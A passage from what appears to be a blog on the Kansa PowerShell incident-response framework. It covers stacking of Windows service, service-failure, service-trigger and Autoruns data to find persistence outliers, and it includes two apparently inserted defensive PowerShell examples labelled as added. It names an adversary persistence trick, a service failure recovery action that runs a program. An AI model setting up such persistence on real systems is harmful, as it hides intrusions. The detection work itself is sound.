<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAdVIaMA49EZ8FmrwINGpB9Ac4pyEthnnrjslTfpIAXvN_Nh0DEFjNiaw7DfXJElb_f7KSM9OnKRzHhOF9cjc8U_VAeUHRnL6jw7r7_awlNo6ECDU5zVuUTgAtPUxbJoXC9N91IpGYKyM/s1600/Get-SvcAll.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAdVIaMA49EZ8FmrwINGpB9Ac4pyEthnnrjslTfpIAXvN_Nh0DEFjNiaw7DfXJElb_f7KSM9OnKRzHhOF9cjc8U_VAeUHRnL6jw7r7_awlNo6ECDU5zVuUTgAtPUxbJoXC9N91IpGYKyM/s1600/Get-SvcAll.jpg" height="17" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for larger image</td></tr>
</tbody></table>
Stacking by these properties across many hosts shows investigators services that may have the same Caption, but different binaries and arguments. This same kind of analysis is available in the Autoruns stacking scripts with the added benefit of stacking by file hash (e.g. MD5).<br />
<br />
Get-SvcStartNameStack.ps1 stacks by Caption and <strong>StartName</strong>, the latter of which turns out to be the name of the account the service runs under.<br />
<br />
Another Service analysis script, but not a stacker, is Get-SvcAllRunningAuto.ps1, which pulls the list of Services that were in a running state or set to start automatically when the Get-SvcAll.ps1 collector ran on the targets.<br />
<h4>
ASEPs not collected by Autorunsc:</h4>
As I mentioned above, Sysinternals' Autoruns and Autorunsc executables collect all the ASEPs they know to collect, but that is not the universe of ASEPs.<br />
<br />
Windows Services can be configured to recover from failures. In my experience, restarting the service is the most common recovery option, but one option that adversaries can use is the "Run a Program" option as shown below:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXsCSzrgrHgHD3NYbjL_uKzjxpF1uWe9VazAWc-HP-Qnxx8AZidHngzQWERxZXrjRP4zo9wWhQ1-Yk5Ye80aULDxfHKZadAYKTkVwSsOxAYeRrZoSGkHOQls40sVx5_iZqOpdrzFk4kuU/s1600/svcfail2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXsCSzrgrHgHD3NYbjL_uKzjxpF1uWe9VazAWc-HP-Qnxx8AZidHngzQWERxZXrjRP4zo9wWhQ1-Yk5Ye80aULDxfHKZadAYKTkVwSsOxAYeRrZoSGkHOQls40sVx5_iZqOpdrzFk4kuU/s1600/svcfail2.png" height="400" width="352" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for larger image</td></tr>
</tbody></table>
In the screen shot above, the Application Identity service is configured with a failure recovery response that will run a program called ServiceRecovery.exe from C:\ProgramData\Microsoft\ with the command line argument -L 443. This is a persistence mechanism that Autorunsc won't capture.<br />
Kansa's <strong>Get-SvcFail.ps1</strong> collector will collect service failure recovery information from all services. Kansa includes a few analysis scripts that will stack the service failure recovery data, but the most useful one is <strong>Get-SvcFailCmdLine.ps1</strong>, which returns the frequency count of the program and command line parameters from all the collected service failure information. The image below shows this data from a few thousand systems:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmdvIuVHO_JKw-lX2888w97XGLYltIzssqe-VBlKaD1Yq4GAsgY5jQ9Ulu0W_ywtDQ9HeFWsNUr1nQx0uhR7jcVE1nfMRl4T5GWbxmBd3URboTMCy43YOWOe1VE7wN0q_1F_bNMPUkb9A/s1600/SvcFailCmdLine.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmdvIuVHO_JKw-lX2888w97XGLYltIzssqe-VBlKaD1Yq4GAsgY5jQ9Ulu0W_ywtDQ9HeFWsNUr1nQx0uhR7jcVE1nfMRl4T5GWbxmBd3URboTMCy43YOWOe1VE7wN0q_1F_bNMPUkb9A/s1600/SvcFailCmdLine.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for larger image</td></tr>
</tbody></table>
In the example there are 129769 Service Failure entries, 75088 of them have the same program and command line arguments configured as a recovery option. Seems unlikely this is malicious.<br />
<br />
In another smaller data set, the following data was returned:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU41UeVfRhoyVNjIkZGmdsLUiqqsEBVSuoBOz48h6UsBQyDZRGutO7F3HrjZ9DOKS3yZ5gby6MAURGDAoFv8R7unT6QNCVqz-H_Ui_xKbjZxkesbIejK3r4tI_OnBKfOtkoQGA8nk8pV4/s1600/SvcFailCmdLine2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU41UeVfRhoyVNjIkZGmdsLUiqqsEBVSuoBOz48h6UsBQyDZRGutO7F3HrjZ9DOKS3yZ5gby6MAURGDAoFv8R7unT6QNCVqz-H_Ui_xKbjZxkesbIejK3r4tI_OnBKfOtkoQGA8nk8pV4/s1600/SvcFailCmdLine2.jpg" height="147" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for larger image</td></tr>
</tbody></table>
I include this screen shot because I've run into the customscript.cmd entry in multiple data sets and in all the cases I've investigated, I've not yet found a service that referenced customscript.cmd anywhere in the Services GUI, but you will see services reference it in the data of their Registry key values, like the following:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXpYdfAHro2Q1G9xh8dAEu-8lBcxZdvjQszeTItWkAA8UrpGED9EZQ8B8lpuuRqJjLlDOqlVFB-437WWnUbPO9TpbsPLyh5viopibnqhau3GvxRhcZB7IeiGnHihmGl0p2RPZww6Wln7k/s1600/customscriptregistry.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXpYdfAHro2Q1G9xh8dAEu-8lBcxZdvjQszeTItWkAA8UrpGED9EZQ8B8lpuuRqJjLlDOqlVFB-437WWnUbPO9TpbsPLyh5viopibnqhau3GvxRhcZB7IeiGnHihmGl0p2RPZww6Wln7k/s1600/customscriptregistry.jpg" height="347" width="640" /></a></div>
<br />
I've also searched file systems on hosts where I've seen this, but I've not found a file on disk called customScript.cmd. I wanted to mention it here in case you run across it. If you do see a reference to customscript.cmd that includes a path, you may have an adversary attempting to blend in with a common value.<br />
<br />
The last Service related collector in Kansa, as of this writing, is <strong>Get-SvcTrigs.ps1</strong>, which collects another set of ASEPs that Autoruns does not collect, yet -- Service Triggers. Service Triggers are new with Windows 7 and later versions of Windows. They allow Windows Services to have more startup flexibility than the old Manual and Automatic startup modes. Now services can respond to the presence of specific hardware, group policy changes, networking events, etc. More information about Service Triggers can be found at the following links:<br />
<ul>
<li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/dd405513(v=vs.85).aspx">http://msdn.microsoft.com/en-us/library/windows/desktop/dd405513(v=vs.85).aspx</a></li>
<li><a href="http://blogs.windows.com/windows/archive/b/developers/archive/2009/10/26/windows7-trigger-start-services-part-1-introduction.aspx">http://blogs.windows.com/windows/archive/b/developers/archive/2009/10/26/windows7-trigger-start-services-part-1-introduction.aspx</a></li>
<li><a href="http://blogs.windows.com/windows/archive/b/developers/archive/2009/10/27/windows7-trigger-start-services-part-2-building-a-trigger-start-optimized-service.aspx">http://blogs.windows.com/windows/archive/b/developers/archive/2009/10/27/windows7-trigger-start-services-part-2-building-a-trigger-start-optimized-service.aspx</a></li>
</ul>
Kansa includes a basic stacker for Service Triggers. Interpreting the data to determine what's normal and what's suspicious can be daunting and tedious. Searching on GUIDs can be of some help. Below is a frequency listing of Service Triggers from a relatively small sample, two systems. <br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI5l9yiJtj7LYLScA72jb7UrVtcE-wDdCHt172MWc_82fiAcedVDeVzPWQ_RGI21WMsPpncXUAx_5bBAho1-XOYsrujEJpa7hlbSQMxEFT09TWK7l2a428mCn8itlCcRKmVxjBno_Pzkc/s1600/svctrigstack.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI5l9yiJtj7LYLScA72jb7UrVtcE-wDdCHt172MWc_82fiAcedVDeVzPWQ_RGI21WMsPpncXUAx_5bBAho1-XOYsrujEJpa7hlbSQMxEFT09TWK7l2a428mCn8itlCcRKmVxjBno_Pzkc/s1600/svctrigstack.jpg" height="152" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for larger image</td></tr>
</tbody></table>
I have Service Trigger data from a few thousand machines, but I'm not at liberty to share it here. Trust me when I say finding outliers is easier with a larger data set, but keep in mind that just because something is an outlier doesn't mean it's bad, and the inverse is also true: just because something is common, it's not necessarily good.<br />
<br />
There is one more ASEP that I know of that Autoruns won't catch but that Kansa collects; I'll save that for another post.<br />
<br />
<h2>
Kansa: Autoruns data and analysis</h2>
Posted by davehull, 2014-04-29<br />
<br />
<h2>
I want your input.</h2>
With the "Trailer Park" release of <a href="https://github.com/davehull/Kansa" target="_blank">Kansa</a> marking a milestone for the core framework, I'm turning my focus to analysis scripts for data collected by the current set of modules. As of this writing there are 18 modules, with some overlap between them. I'm seeking more ideas for analysis scripts to package with Kansa and am hopeful that you will submit comments with novel, implementable ideas.<br />
<h3>
Existing modules can be divided into three categories:</h3>
<ol>
<li>Auto Start Extension Points or ASEP data (persistence mechanisms)</li>
<li>Network data (netstat, dns cache)</li>
<li>Process data</li>
</ol>
In the interest of keeping posts to reasonable lengths, I'll limit the scope of each post to a small number of modules or collectors.<br />
<h3>
ASEP collectors and analysis scripts</h3>
<h4>
Get-Autorunsc.ps1</h4>
Runs Sysinternals Autorunsc.exe with arguments to collect all ASEPs (that Autoruns knows about) across all user profiles, and includes ASEP hashes, code signing information (Publisher) and command line arguments (LaunchString).<br />
<br />
<strong>Current analysis scripts for Get-Autorunsc.ps1 data:</strong><br />
<strong>Get-ASEPImagePathLaunchStringMD5Stack.ps1</strong><br />
Returns a frequency count of ASEPs aggregating on ImagePath, LaunchString and MD5 hash.<br />
<br />
<strong>Get-ASEPImagePathLaunchStringMD5UnsignedStack.ps1</strong><br />
Same as previous stacker, but filters out signed ASEPs.<br />
<br />
<strong>Get-ASEPImagePathLaunchStringPublisherStack.ps1</strong><br />
Returns frequency count of ASEPs aggregated on ImagePath, LaunchString and code signer.<br />
<br />
<strong>Get-ASEPImagePathLaunchStringStack.ps1</strong><br />
Returns frequency count of ASEPs aggregated on ImagePath and LaunchString.<br />
<br />
<strong>Get-ASEPImagePathLaunchStringUnsignedStack.ps1</strong><br />
Same as previous, but filters out signed code.<br />
<br />
A picture is worth a few words, so here's a sample of output from the previous analysis script for data from a couple of systems:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3C7TOCnwJHbeVXdWcsmOV52Op5LcvY-S-kTIevTQRDE5dICCjvV5oTCzkH3pxAJq9DE_1lqv6J7zkOo6QVlLlN1UV-a4ma0CQf-18VlAzS6P4CX9HwGY4msFcMyTKVfpZZMJaa1tBYk0/s1600/Get-ASEPIPLSUn.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3C7TOCnwJHbeVXdWcsmOV52Op5LcvY-S-kTIevTQRDE5dICCjvV5oTCzkH3pxAJq9DE_1lqv6J7zkOo6QVlLlN1UV-a4ma0CQf-18VlAzS6P4CX9HwGY4msFcMyTKVfpZZMJaa1tBYk0/s1600/Get-ASEPIPLSUn.png" height="160" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for full size image</td></tr>
</tbody></table>
The image above shows the unsigned ASEPs on the two hosts, aggregated by ImagePath and LaunchString. You may want to know which host a given ASEP came from; however, including the host in the output above would break the aggregation, because an entry common to both hosts would then show up as two rows of one instead of one row of two. To trace the 7-zip ASEP back to the host it was found on, copy the ImagePath or LaunchString value and, from the Output\Autorunsc\ directory where the script was run, use the PowerShell cmdlet:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace; font-size: x-small;">Select-String -SimpleMatch -Pattern "c:\program files (x86)\7-zip\7-zip.dll" *autoruns.tsv</span><br />
<br />
The result shows each file, and each line in that file, that matches the pattern. Each filename contains the hostname the data came from, and the hostname is also present on every line in the PSComputerName field.<br />
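The stacking and host look-up described above, as an added example that is not part of Kansa or its analysis scripts: one function that stacks Get-Autorunsc.ps1 TSV output on a chosen key (ImagePath, LaunchString and MD5 by default) and records the distinct hosts in each group as a derived column, so the aggregation survives and the separate Select-String step is unnecessary. It assumes the files are named *autoruns.tsv with the columns Get-Autorunsc.ps1 returns, and that autorunsc ran with signature verification so the Publisher column starts with "(Verified)" for signed code; the two-host sample data is constructed for the demo.

```powershell
# Added example, not part of Kansa. Stacks Get-Autorunsc.ps1 TSV output on a
# chosen key and records the distinct hosts per group as a derived column.
# Assumptions: files are named *autoruns.tsv with the columns Get-Autorunsc.ps1
# returns (ImagePath, LaunchString, MD5, Publisher, PSComputerName, ...), and
# autorunsc ran with signature verification so Publisher starts with
# "(Verified)" for signed code; anything else is treated as unsigned.

function Get-ASEPStack {
    [CmdletBinding()]
    param(
        [string]$Path = '.',
        [string[]]$GroupBy = @('ImagePath', 'LaunchString', 'MD5'),
        [switch]$UnsignedOnly
    )

    $entries = Get-ChildItem -Path $Path -Filter '*autoruns.tsv' -File |
        ForEach-Object { Import-Csv -Path $_.FullName -Delimiter "`t" }

    if ($UnsignedOnly) {
        # Anything autorunsc could not verify (including an empty Publisher) stays.
        $entries = $entries | Where-Object { $_.Publisher -notmatch '^\(Verified\)' }
    }

    $entries |
        Group-Object -Property $GroupBy |
        ForEach-Object {
            $first = $_.Group[0]
            $row = [ordered]@{ Count = $_.Count }
            foreach ($field in $GroupBy) { $row[$field] = $first.$field }
            # Hosts is derived from the group, not part of the key, so it does not
            # split the stack the way adding PSComputerName to the key would.
            $row['Hosts'] = ($_.Group.PSComputerName | Sort-Object -Unique) -join ';'
            [pscustomobject]$row
        } |
        Sort-Object -Property Count   # least frequent first: that is where the outliers are
}

# Constructed sample data (two hosts, three ASEPs) so the example runs offline.
function New-SampleAutorunsData {
    param([string]$Dir = (Join-Path ([IO.Path]::GetTempPath()) 'asep-stack-demo'))
    New-Item -ItemType Directory -Path $Dir -Force | Out-Null
    $header = 'Time','EntryLocation','Entry','Enabled','Category','Description','Publisher',
              'ImagePath','Version','LaunchString','MD5','SHA1','PESHA1','PESHA256','SHA256',
              'PSComputerName','RunspaceId','PSShowComputerName'
    # Publisher, ImagePath, LaunchString and MD5 per entry; everything else is filler.
    $verifiedMs = '(Verified) Microsoft Windows'
    $samples = @{
        HOST01 = @(
            @($verifiedMs, 'c:\windows\system32\userinit.exe', 'c:\windows\system32\userinit.exe,', 'aaaa'),
            @('(Not verified) Igor Pavlov', 'c:\program files (x86)\7-zip\7-zip.dll', '{7z-shell-ext-clsid}', 'bbbb'),
            @('', 'c:\users\bob\appdata\roaming\svchost.exe', 'c:\users\bob\appdata\roaming\svchost.exe', 'cccc')
        )
        HOST02 = @(
            @($verifiedMs, 'c:\windows\system32\userinit.exe', 'c:\windows\system32\userinit.exe,', 'aaaa'),
            @('(Not verified) Igor Pavlov', 'c:\program files (x86)\7-zip\7-zip.dll', '{7z-shell-ext-clsid}', 'bbbb')
        )
    }
    foreach ($hostName in $samples.Keys) {
        $lines = @($header -join "`t")
        foreach ($s in $samples[$hostName]) {
            $lines += (@('2014-04-01 10:00', 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'entry',
                         'enabled', 'Logon', '', $s[0], $s[1], '1.0', $s[2], $s[3], 'sha1', 'pesha1',
                         'pesha256', 'sha256', $hostName, '00000000-0000-0000-0000-000000000000', 'True') -join "`t")
        }
        Set-Content -Path (Join-Path $Dir "$hostName-autoruns.tsv") -Value $lines -Encoding UTF8
    }
    return $Dir
}

$dir = New-SampleAutorunsData
Get-ASEPStack -Path $dir -UnsignedOnly | Format-Table -AutoSize
Get-ASEPStack -Path $dir -GroupBy ImagePath, LaunchString | Format-Table -AutoSize
```

With the sample data, the unsigned stack drops the verified userinit.exe entries and leaves the 7-zip DLL (seen on both hosts) and the roaming-profile svchost.exe (seen on one), with the Hosts column answering the "which host" question directly. Pass -GroupBy with the fields the existing stackers use (add Publisher or MD5 to the key) to reproduce each of them from the same function.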
<br />
<strong>Get-Autorunsc.ps1</strong> returns the following fields:<br />
<strong>Time</strong>: Last modification time from the Registry or file system for the EntryLocation<br />
<strong>EntryLocation</strong>: Registry or file system location for the Entry<br />
<strong>Entry</strong>: The entry itself<br />
<strong>Enabled</strong>: Enabled or disabled status<br />
<strong>Category</strong>: Autorun category<br />
<strong>Description</strong>: A description of the Autorun<br />
<strong>Publisher</strong>: The publisher from the code signing certificate, if present<br />
<strong>ImagePath</strong>: File system path to the Autorun<br />
<strong>Version</strong>: PE version info<br />
<strong>LaunchString</strong>: Command line arguments or class id from the Registry<br />
<strong>MD5</strong>: MD5 hash of the ImagePath file<br />
<strong>SHA1</strong>: SHA1 hash of the ImagePath file<br />
<strong>PESHA1</strong>: SHA1 Authenticode hash of the ImagePath file<br />
<strong>PESHA256</strong>: SHA256 Authenticode hash of the ImagePath file<br />
<strong>SHA256</strong>: SHA256 hash of the ImagePath file<br />
<strong>PSComputerName</strong>: The host where the entry came from<br />
<strong>RunspaceId</strong>: The runspaceid for the Powershell job that collected the data<br />
<strong>PSShowComputerName</strong>: A Boolean flag about whether or not the PSComputerName is included<br />
<br />
These last three fields are artifacts of Powershell remoting.<br />
<br />
Given the available data and the currently available analysis scripts, what other analysis capabilities make sense for the Get-Autorunsc.ps1 output?<br />
<br />
One idea is to build on the approach explored in a previous post of mine, "<a href="http://trustedsignal.blogspot.com/2012/02/finding-evil-automating-autoruns.html?q=autoruns" target="_blank">Finding Evil: Automating Autoruns Analysis</a>": a script that takes an external dependency on a database of file hashes categorized as good, bad and unknown. The script would match the hashes in the Get-Autorunsc.ps1 output against that database, discarding the good, alerting on the bad and submitting unknowns to VirusTotal to see what, if anything, is known about them. If VT says they are bad, insert them into the database and alert. If VT says they are good, insert them into the database and ignore them in future runs. If VT has no information on them, mark them for follow-up and send them to Cuckoo sandbox or similar for analysis.<br />
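The good/bad/unknown triage loop sketched above, as an added example that is not part of Kansa: the partition logic runs against a local hash store and an injected lookup, so it can be exercised offline with a constructed lookup, while Get-VTVerdict is a VirusTotal v3 file-report client you can pass in when you have an API key. The hash-store format (a CSV of SHA256,Verdict), the "three or more engines flag it" threshold and the sample entries are assumptions of this example; the Cuckoo hand-off is represented by the FollowUp list the function returns.

```powershell
# Added example, not part of Kansa. Triage Get-Autorunsc.ps1 entries against a
# local store of known hashes: drop good, alert on bad, look up unknowns once per
# hash, cache VT's verdict, and return the rest for sandbox follow-up.
# Assumptions: store is a CSV with SHA256,Verdict columns; BadThreshold of 3
# engines is arbitrary; the lookup is injected so the demo runs offline.

function Import-HashStore {
    param([string]$Path)
    $store = @{}
    if (Test-Path $Path) {
        Import-Csv -Path $Path | ForEach-Object { $store[$_.SHA256.ToLower()] = $_.Verdict }
    }
    return $store
}

function Export-HashStore {
    param([hashtable]$Store, [string]$Path)
    $Store.GetEnumerator() |
        ForEach-Object { [pscustomobject]@{ SHA256 = $_.Key; Verdict = $_.Value } } |
        Export-Csv -Path $Path -NoTypeInformation
}

function Get-VTVerdict {
    # VirusTotal v3 file report; returns 'bad', 'good' or 'unknown'. Needs network + key.
    param([string]$Sha256, [string]$ApiKey, [int]$BadThreshold = 3)
    try {
        $r = Invoke-RestMethod -Uri "https://www.virustotal.com/api/v3/files/$Sha256" `
                               -Headers @{ 'x-apikey' = $ApiKey }
        $stats = $r.data.attributes.last_analysis_stats
        if ($stats.malicious -ge $BadThreshold) { return 'bad' }
        return 'good'
    } catch {
        if ([int]$_.Exception.Response.StatusCode -eq 404) { return 'unknown' }  # VT has never seen it
        throw   # quota, auth or network errors must not be mistaken for "unknown"
    }
}

function Invoke-ASEPTriage {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][object[]]$Entries,   # objects with SHA256, ImagePath, PSComputerName
        [Parameter(Mandatory)][hashtable]$Store,    # sha256 -> 'good' | 'bad'
        [Parameter(Mandatory)][scriptblock]$Lookup  # sha256 -> 'good' | 'bad' | 'unknown'
    )
    $result = [ordered]@{ Alerts = @(); FollowUp = @(); Ignored = 0 }
    # Group on hash first so each unknown is looked up once, not once per host.
    foreach ($group in ($Entries | Group-Object -Property SHA256)) {
        $hash = $group.Name.ToLower()
        if (-not $hash) { $result.FollowUp += $group.Group; continue }   # no hash: file was missing
        $verdict = $Store[$hash]
        if (-not $verdict) {
            $verdict = & $Lookup $hash
            if ($verdict -ne 'unknown') { $Store[$hash] = $verdict }     # cache for future runs
        }
        switch ($verdict) {
            'good'    { $result.Ignored  += $group.Count }
            'bad'     { $result.Alerts   += $group.Group }
            'unknown' { $result.FollowUp += $group.Group }               # sandbox candidates
        }
    }
    return [pscustomobject]$result
}

# Constructed sample: four entries on two hosts, a one-line known-good store,
# and a fake lookup standing in for VirusTotal.
$entries = @(
    [pscustomobject]@{ SHA256 = 'AAAA'; ImagePath = 'c:\windows\system32\userinit.exe';        PSComputerName = 'HOST01' },
    [pscustomobject]@{ SHA256 = 'AAAA'; ImagePath = 'c:\windows\system32\userinit.exe';        PSComputerName = 'HOST02' },
    [pscustomobject]@{ SHA256 = 'BBBB'; ImagePath = 'c:\users\bob\appdata\roaming\svchost.exe'; PSComputerName = 'HOST01' },
    [pscustomobject]@{ SHA256 = 'CCCC'; ImagePath = 'c:\programdata\updater.exe';               PSComputerName = 'HOST02' }
)
$store = @{ 'aaaa' = 'good' }
$fakeLookup = { param($h) if ($h -eq 'bbbb') { 'bad' } else { 'unknown' } }

$triage = Invoke-ASEPTriage -Entries $entries -Store $store -Lookup $fakeLookup
$triage.Alerts   | Format-Table ImagePath, PSComputerName -AutoSize
$triage.FollowUp | Format-Table ImagePath, PSComputerName -AutoSize
```

In production, replace $fakeLookup with `{ param($h) Get-VTVerdict -Sha256 $h -ApiKey $env:VT_API_KEY }` and call Export-HashStore afterwards so the cached verdicts persist; the 404 check matters because a quota or network error that silently became "unknown" would turn real hits into follow-up noise.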
<br />
What ideas do you have? What would be helpful to you during IR?<br />
<br />
Thanks for taking the time to read and comment with your thoughts and ideas.<br />
<br />
If you found this information useful, please check out the <a href="http://www.sans.org/event/dfir-summit-2014?utm_source=offsite&utm_medium=text-ad&utm_campaign=DFIR_Summit&utm_content=2014_TE_DFIR_Summit_Speaker_Links_12_Dave_Hull" target="_blank">SANS DFIR Summit</a> where I'll be speaking about Kansa, IR and analysis in June.